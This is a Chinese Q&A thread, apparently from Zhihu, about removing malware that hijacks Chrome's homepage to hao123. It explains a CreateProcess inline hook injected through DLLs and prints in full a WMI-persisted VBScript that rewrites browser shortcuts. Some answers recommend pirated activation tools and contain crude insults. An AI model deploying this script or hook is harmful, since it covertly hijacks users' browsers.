標籤:

為什麼 Chrome 瀏覽器的主頁會被篡改為 hao123 ?遇到這種情況要如何修復?

12-26
前幾天,突然發現默認瀏覽器的Chrome的主頁被篡改為了hao123。每次第一次打開,都自動跳轉到http://www.hao123.com/?tn=29065018_59_hao_pg這個網址。自己到網上搜了一下,試了各種方法最終還是無果,本著屌絲懂技術,神都難不住的精神決定自己破掉它。(*^__^*) 嘻嘻……
&<一&> 縮小包圍圈

1、chrome設置?


對chrome中的啟動時、外觀屬性都進行了修改,仍然沒有解決問題。

2、快捷方式中添加了參數?


發現不管是從桌面快捷方式還是直接點擊exe文件,chrome主頁都被篡改。這就排除了是在桌面快捷方式中的目標欄中添加了hao123網址的緣故。哎,查看一下桌面chrome快捷方式不就得了,整的這麽麻煩。囧。

3、chrome.exe被篡改或者chrome配置文件被修改?

將chrome的配置文件和可執行文件一同拷貝到虛擬機中,擦,在虛擬機中就沒問題。說明問題不在chrome身上。

那會是什麼問題呢?山重水複疑無路,柳暗花明又一村。轉折來了,將chrome.exe重新命名後,再打開瀏覽器,主頁就是設置的www.google.com.hk,這樣就沒問題了。測試一下,將firxfox.exe重命名位chrome.exe後,主頁也被篡改位流氓導航頁。看來chrome.exe是個關鍵詞啊!一個解決方案就這樣誕生了,太easy了吧。但是這裡面到底隱藏著什麼奧秘呢?繼續整!

&<二&>我要看代碼

1. 先上第一個利刃,microsoft旗下的Process Explorer。


查看chrome.exe的主進程信息如下,亮點就在下圖中。

小夥伴們一定看到了Command line下面的編輯框里有我們久違的流氓url吧。這個Comand
line是什麼東東?


Windows下常見的創建進程的api就是CreateProcess,這個函數申明如下。

其中的第二個參數,就是Command line,在我們這裡就是chrome.exe應用程序的參數。該api的詳細介紹在http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx。

現在的問題就是這個command line是誰傳遞給chrome.exe進程的?弄清楚這個問題之前,先要搞清楚,windows下,雙擊或者右鍵打開應用程序時,該應用程序進程是誰創建的?查閱資料發現,通過雙擊或者右鍵打開的應用程序進程都是由explorer.exe這個進程調用CreateProcess創建的。那麼,我們的流氓url Command line 就一定是explorer.exe傳遞給chrome.exe。看來explorer.exe有問題了。測試一下,通過任務管理器中的創建新任務的方式啟動chrome就沒有流氓導航了。但是通過和虛擬機中的explorer.exe文件對比,發現主機和虛擬機中的兩個文件完全相同。Exe運行時不光要載入自身的.exe程序文件,還要依賴一些動態庫dll。是不是dll有問題。利刃2上場。

2、ollydbg閃亮上場。

用od載入explorer.exe運行,查看所依賴的dll。

看到有幾個可疑的非系統dll,QvodExtend.dll,
QvodWebBase.dll,按理說explorer.exe是不會依賴非系統dll的。想起來,網上說的卸載Qvod可以解決問題。這個怎麼能說卸就卸呢?萬萬不可以的。

問題肯定是在調用CreateProcess之前出現的,在當前模塊中查找調用CreateProcess的地方,一共有四個點,全部設置斷點,然後調試explorer.exe進程?當然時調試失敗了。~~~~(&>_&<)~~~~

但是重新載入explorer.exe運行,然後查看kernel32.dll的CreateProcess的代碼發現了重要的問題。


下圖就是kernel32.dll中的CreateProcess代碼,尼瑪不是說好了的CreateProcess將調用CreateProcessInternalW嗎?這兒怎麼上來直接 jmp QvodWebB.10008B90?QvodWebB你要鬧啥啊!!!

看看下面這個正版的CreateProcess吧。

至此,整個流程大致出來了。QvodWebBase.dll將kernel32.dll的CreateProcessW代碼的前5個位元組改為了一條jmp指令,改變了CreateProcess的正常執行流程。實際上,CreateProcessA,CreateInternProcessW,CreateInternProcessA都被注入了相應的跳轉指令。

&<三&>深入巢穴

QvodWeb如何隨explorer.exe載入,QvodExtend.dll, QvodWebBase.dll到底都做了些什麼?先mark,後面接著整。


1.先看看QvodExtend.dll, QvodWebBase.dll都導出了些什麼函數。

下面是QvodWebBase.dll導出的函數。可以看到有InstallWindowsHook鉤子函數。

同時,用IceSword掃描時發現,QvodExtend.dll還是個BHO。

同時,測試發現如果將QvodExtend.dll重命名後,就不會出現主頁被篡改,同時explorer.exe也不會有QvodExtend.dll和QvodWebBase.dll模塊。由此可以推斷,QvodExtend.dll隨explorer.exe或者ieplorer.exe啟動時,會向系統註冊QvodWebBase.dll中的鉤子函數,接著再是載入QvodWebBase.dll時,該dll的DLLMain入口函數會向當前進程注入Jmp指令。

反彙編QvodExtend.dll代碼可以發現,註冊QvodWebBase.dll中的鉤子函數的代碼

至此,整個過程告一段落。
解決辦法就是刪除或者重命名QvodExtend.dll和QvodWebBase.dll。不知道會不會影響qvod,目前不得而知。
----------------------------------------------分割線------------------------------------------------------------------------------
QvodExtend.dll在其dll_main函數中,判斷當前的模塊是explorer.exe或者iexplore.exe,若兩者都不是則退出;否則讀取qvod安裝目錄下的QvodCfg.ini文件獲取
QvodWebBase的版本號,找到 QvodWebBase.dll後調用LoadLibrary載入該模塊(載入過程中會向CreteProcessA/W中注入代碼,這個代碼就是在CreateProcessInteralA調用之前修改comand line參數),接著調用GetProcAddress獲得
QvodWebBase安裝鉤子的導出函數installwindowshook,並執行該函數,該鉤子的類型是WM_CBT。整體流程就是這樣。
----------------------------------------------分割線------------------------------------------------------------------------------

該實驗的軟體版本是QvodPlayer5.17.152.0,目前在最新版本中該問題已經解決。

前兩天也中招了。嘗試恢復設置、重裝chrome、改註冊表均無果。最後意外發現解決方法無比簡單:刪掉桌面上的chrome圖標,打開安裝文件夾找到chrome.exe,隨便改成什麼名字.exe,比如baiduwcnm,重新發送到桌面快捷方式,再開這個baiduwcnm.exe就看不到hao123了。我中的這個版本的百度惡意小軟體應該是找的電腦里的chrome.exe,讓它找不到就好了。

雖然簡單,李彥宏還是死媽。相貌堂堂的干點什麼不好。

這是一種(我見過)比較新的劫持瀏覽器首頁的方式了。它在explorer.exe上註冊了一個鉤子,然後劫持了主流瀏覽器的.exe文件名,當啟動這些瀏覽器的exe的時候就自動帶一個參數——通常瀏覽器的主程序都支持通過參數直接打開某個頁面。
於是會發現瀏覽器設置裡面並沒有修改主頁,但是還是被劫持了。
而且它其實很智障,把瀏覽器的exe改個名字就不會被它勾住了。

是不是這種劫持方式有一個很簡單的判斷方法,通過一個任務管理器(如果系統自帶的不行,那就用ProcessExplorer.exe),找到chrome.exe主進程(ProcessExplorer.exe可以按樹狀方式查看進程,很容易找到主程序是哪個進程),可以右鍵查看它的啟動參數,如果後面跟了流氓網站,那就是這種劫持方式了。

遇到過2次了,第一次稀里糊塗的解決了,第二次找到了解決路徑。
大概就是用了一個工具(好像是火絨xxxxx吧),查看了explorer.exe被哪些dll註冊了鉤子,然後一眼就看出來其中一個是某惡意軟體的,把那個dll找到以後刪掉就行了,順便還可以通過dll的路徑和文件名判斷一下是哪家的軟體搞的鬼。我兩次都是迅雷,口亨。

我也不知道是怎麼中的這個病毒 可能是幫人修硬盤的時候被感染的
這個病毒牛X在變種多 而且殺毒軟體都不認
我們很多人只能默默忍受或者重裝系統
但我是處女座!
在高票知乎大神的提點和bing的搜索下 終於找到這個病毒的原型 現在將自己的做法給大家參考參考 也許能起點啟示作用吧.

1.下載Process Explorer
Process Explorer
https://download.sysinternals.com/files/ProcessExplorer.zip
同高票大神一樣 也是command line中招 而且56家都沒檢測出病毒

這就X了狗了
hao524轉到的頁面就是hao123
更讓人難受的是 我下載的ollydbg無法加載64位的explorer.exe 明明是2.01版的啊...
所以大神的指導到此為止了
後面靠自己+bing

2.既然大神已經提點是explorer.exe被加註了 那我們只好看explorer.exe有什麼奇怪的dll

最終找到了這貨 按照路徑排序 排除掉Microsoft Adobe這類的正式進程 nls是多國語言源文件 沒有問題 所以綜合下來這貨嫌疑最大

我們用百度搜 搜不出來 看來百度已經人工刪除了結果

換bing

人家第一條就是 雖然也只有這一條 但我們能確定這貨就是罪魁禍首

3.嘗試刪除
先cmd檢測一遍

果然呢

用任務管理器結束explorer.exe的進程後再用cmd刪除試試

不行呢 就算把 /a /f /q /s 放後面也白搭 del換成erase也一樣 永遠的參數錯誤 是不是我寫的不對?

4.安全模式
安全模式只加載核心進程 這貨應該不加載吧
所以我們進入安全模式刪除
嗯...刪除成功 但是開機這貨又出現了!
所以嘛... 建個只讀文檔 改成一個名字 並且權限限制死死的 看他怎麼來

奮戰一個晚上
世界清靜了

5.最後祝李彥宏全家 祝百度早日 被水淹沒 不知所措

百度chrome被劫持幾個小時也找不出答案,誰讓hao123被擺渡收購了呢,最後google到了外國人不勝其煩的解決方案(鏈接1),然後用別人自己做的東西修復了(鏈接2)
http://malwaretips.com/blogs/remove-hao123-virus/#junkware
http://thisisudax.org/downloads/JRT.exe
鏈接2可能會被報不受信任,親測沒問題,至少比某管家助手乾淨多了

我也是裝了QVOD後Chrome主頁被纂改了,看了樓主的文章後確定果然是Qvod乾的好事。
於是我看了一下qvod的設置選項,有個發現,找到 選項-&>其他-&>"設快播網址導航作為主頁" 這一項,取消它,就解決了- -。

最近重裝了一次電腦。儘管什麼百度系的軟體我都沒有下載,Chrome瀏覽器的主頁還是被硬生生劫持了。每次點開後的主頁是http://hao.qquu8.com這個鏈接,緊接著它會跳向hao123。電腦上原裝的其他瀏覽器(IE和Edge)也是這樣,弄得每次打開瀏覽器就被噁心一下,很是惱火。

我們先來看看問題在哪。右鍵快捷方式查看屬性:

哦,原來快捷方式被改了,後面加了一段url。把它刪了試試?

還是不行,幾分鐘後還是被改回來了。

我在很多平台上找了解決辦法。有的試了沒有效果,重新開機後還是一樣的毛病,有的推薦裝「管家」,但這種以毒攻毒的辦法無異於飲鴆止渴。最後終於有一種靠譜的方法,經過實驗和一點修改,完美解決!

主頁被劫持的原理是一段通過WMI發起的定時自動運行腳本,WMI(Windows Management Instrumentation)可以理解成Windows系統後台運行的一個事件管理器。為查看WMI事件,先去下載WMITools並安裝:WMI工具。

之後打開WMI Event Viewer:

點擊左上角的筆的圖標(Register For Events),在彈出的Connect to namespace的框直接點OK,Login的頁面也直接點OK。點開左側欄的EventFilter,再點擊下級目錄的項目:

在右側欄右鍵點擊ActiveScriptEventConsumer,並通過view instant properties查看屬性:

在Script Text那一欄我們可以看到這段腳本:

On Error Resume Next

Const link = "http://hao.qquu8.com/?m=yxamp;r=j"
Const link360 = "http://hao.qquu8.com/?m=yxamp;r=jamp;s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart MenuPrograms,C:UserssjtulDesktop,C:UserssjtulAppDataRoamingMicrosoftInternet ExplorerQuick Launch,C:UserssjtulAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu,C:UserssjtulAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar,C:UserssjtulAppDataRoamingMicrosoftWindowsStart MenuPrograms"
browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
oDic.Add LCase(browser), browser
Next
lnkpathsArr = split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
If fso.FolderExists(oFolder) Then
For Each file In fso.GetFolder(oFolder).Files
If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
Set oShellLink = WshShell.CreateShortcut(file.Path)
path = oShellLink.TargetPath
name = fso.GetBaseName(path) "." fso.GetExtensionName(path)
If oDic.Exists(LCase(name)) Then
If LCase(name) = LCase("360se.exe") Then
oDicShellLink.Arguments = link360
Else
oShellLink.Arguments = link
End If
If file.Attributes And 1 Then
fsoile.Attributes = file.Attributes - 1
End If
oShellLink.Save
End If
End If
Next
End If
Next

終於抓到了幕後黑手。可以看到這是一段VBScript代碼,攻擊目標涵蓋了包括Chrome、360、Firefox、搜狗等30餘種常見的瀏覽器。腳本以瀏覽器的安裝地址為切入點,創建WshShell對象,進而生成植入了流氓網站的快捷方式。360瀏覽器有限定主頁格式,於是這段腳本還特地修飾了流氓網站的鏈接。唉,流氓至此,也是服了。

查到了源頭如何清清除這段造孽的腳本呢?直接在WMI Event Viewer中將_EventFilter.Name="VBScriptKids_filter"右鍵刪掉會被系統拒絕掉,需要去WMI Event Viewer的安裝位置,右鍵以管理員方式運行exe文件才能刪掉。之後還要把各個快捷方式都改回不帶流氓網站的版本,包括桌面上的、開始菜單里的以及快速訪問欄里的快捷方式,其中開始菜單里的快捷方式要去C:ProgramDataMicrosoftWindowsStart MenuPrograms里改掉。唉,一趟下來真是讓人心累,好在最終瀏覽器擺脫了流氓網站的劫持:

當然在這時候,你可以點擊之前下載的WMI安裝包,把WMI系列工具卸載掉。

最後提一下電腦中毒的原因。我分析是前幾天用了小馬激活這個工具來激活Windows系統,當時並沒有激活成功反而還引來了病毒。推薦一款俄羅斯人開發的工具,可以成功激活Windows系統和Office軟體,也不會招來一些流氓腳本:KMSAuto。

詳見搶救被流氓網站劫持的瀏覽器主頁

我的卻是小馬激活工具給搞的,這麼謹慎的人也會中招。。附解決方式hao123、hao.qquu8.com劫持IE、Chrome瀏覽器被的解決辦法_TechWeb

沒有買賣,就沒有傷害。我找了好久,各種殺毒軟體下一通。

----------------9.15--------------
感覺被騙了,綁架了,被強姦了。這個軟體的功能是阻攔廣告,讓用戶不被廣告強姦,可卻在用戶不知情的情況下,強制挾持了用戶到另一個無法被拒絕廣告。

我的癥狀和答主的完全一樣!但是就是不知道哪個DLL是元兇,因為我的電腦里沒有快播……

長見識了,原來有這麼多渠道可以劫持chrome主頁。
補充下我遇到的情況:
我的Chrome被劫持是從使用了HEU_KMS_Activator_v10.0.0.exe後開始的,推測下載的是一個被人動過手腳的版本,然後啟動Chrome和IE時被導向到

http://so.heukms.com/ ,然後再被重定向hao123

右鍵開始菜單和快速啟動欄的快捷方式可知,是通過修改chrome的啟動參數實現的「首頁」:

刪掉後面的鏈接即可,但是重啟後又出現了快捷方式劫持,查找後發現,在windows計劃任務中存在一個可疑項,刪除後問題解決。

今天開電腦發現谷歌瀏覽器首頁竟然默認是hao123。然後又發現是百度旗下的垃圾軟體。用了各種方法都無法搞定。火絨等等都沒用。然後我反思下,我的系統是正版,昨天也沒事,我就看卸載和更改程序管理里,發現多了一個 Yuike cloud network ,不知道是個什麼玩意。抱著試試心態就刪除。然後就好了。我只能說,百度這幫下三濫的玩意。害我浪費大半個下午。

背景:最新版的win10 小馬激活
刪除系統盤下的oem8文件即可

以前用Windows的時候,也是這種情況,弄了整整一天也沒有弄好,那叫一個憋屈。我是那種一定要掌控自己的東西的人,不容許外人染指,受不了此般屈辱,當天晚上我就重裝了系統,然後到123首頁的「反饋」中罵了個狗血淋頭。

前兩天用KMS10激活,中招。研究很久終於解決。

結論:我碰到的問題是被在WMI中植入一個ASEC腳本,每天輪詢各瀏覽器目錄並在各瀏覽器快捷方式後添加「http://hao.qquu8.com/?m=yxr=j」的URL。解決方法是下載微軟WMI tool (WMI Administrative Tools),以管理員身份運行WMI Event Viewer,在Consumer in rootCIMV2 -&> _EventConsumer -&> ActiveScriptEventConsumer下,找到可疑腳本,右鍵刪除。然後手動把各快捷方式中的URL參數刪除,到目前未複發。

排錯步驟:
1. 檢查桌面Chrome和Edge 快捷方式,發現被添加qquu8的URL,刪除之,重啟後正常;
2. 第二天使用電腦時發現Chrome快捷方式又被添加URL,我擦!
3. 參考之前答案,單純刪除快捷方式中URL參數無效;註冊表中無異常項;OEM8文件夾不存在;
4. 安裝騰訊電腦管家,僅能發現快捷方式問題並刪除,好像和手動刪除無異,不解決根源。並未像其官方描述可以「攔殺」(只攔沒殺),不夠厚道啊:騰訊反病毒實驗室:警惕Win10激活工具破壞系統。
5. 反覆搜索後找到參考文章1-5,使用WMI event view找到可疑腳本並刪除,解決。

其他:
1. 對腳本作者表達深深的惡意,畫個圈圈詛咒你!
2. 腳本里有個判斷很有意思,正常情況是添加「http://hao.qquu8.com/?m=yxr=j」,但如果判斷有360se.exe(360主程序),則添加「http://hao.qquu8.com/?m=yxr=js=3」,不明則厲……
3. 還是支持正版吧!還是支持正版吧!還是支持正版吧!

參考:
1. 菜園子 -劉白菜的個人博客
2. 解決hao123脅持chrome主頁問題
3. (原創)如何手工去除http://www.2345.com/?kunown惡意鏈接!_Gemini_新浪博客
4. 小馬 KMS10激活系統後的瀏覽器小尾巴分析與清除
5. http://demon.tw/copy-paste/vbs-wmi-trojan-3.html

chrome怎麼設置都是hao123為主頁,無意中發現把桌面的chrome桌面快捷方式刪掉,重新在開始菜單發送一個chrome快捷方式到桌面就可以了,再也沒有hao123了

前面大神們詳細分析了原因,非常專業。

我是通過下載MSE(Microsoft Security Essentials)掃描刪除後解決的,簡單得讓我啞口無言,而且說不出來其中道理。查出來了一個DLL文件。

MSE是微軟的官方軟體,下載地址:Microsoft Security Essential: 微軟安全軟體

對於這種病毒的分析,請看:【原創】2016年新型瀏覽器劫持病毒――「百變導航」病毒! 非常準確!

我的主頁是被HEU_KMS_Activator篡改了。

解決辦法:
查看瀏覽器屬性 - 目標,刪除最後被篡改上去的網址。

文件清理:
刪除C:Windows 下的 HEUKMSACTIVITOR 目錄

註冊表清理:
刪除這兩處的Start Page鍵值
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain]
[HKEY_LOCAL_MACHINESOFTWAREWow6432NodeMicrosoftInternet ExplorerMain]

一樓答案太過技術宅,一般人不見得看得懂。
請用 adwcleaner,JRT, HitmanPro, 這些在工具的最新合適版本來試一下吧,一般都解決了的。
具體圖文詳情可以參考這裡: 瀏覽器被hao123劫持了,怎麼辦?"

2017-05-17 chrome瀏覽器被劫持到http://www.hao123.com。解決方案如下,有效。
下載Process Explorer,怎麼下載這個不談了。

選擇chrome,屬性可以看到command line被劫持。
根據其他答主的回答,可以確定是某個DLL的問題,導致explorer.exe被劫持。
最終,發現yuike相關的dll是有問題的。
打開Process Explorer--&>View--&>Lower Pan view--?DLLs ,下層面板查看dll,點擊name進行排序,然後把yuike相關的dll全部選擇,右鍵看屬性然後查找文件位置,全部刪除!!!
Yuike Cloud Service居然在控制面板-程序卸載裡面好像也有,但是刪了沒用,一定要刪除dll。

修復了!

yuike cloud network這個垃圾公司,我艹你全家。

推薦閱讀:

Chrome 原生支持遊戲功能和外設技術對網頁遊戲未來會有怎樣的影響?
OneNote 的 Chrome 插件剪輯時,無法將圖片發送至筆記本,有沒有好辦法?
Chrome web store 里安裝的 eBuddy 和直接用網頁登陸有什麼區別?
如何管理瀏覽器的書籤(收藏)?

TAG:GoogleChrome | dll |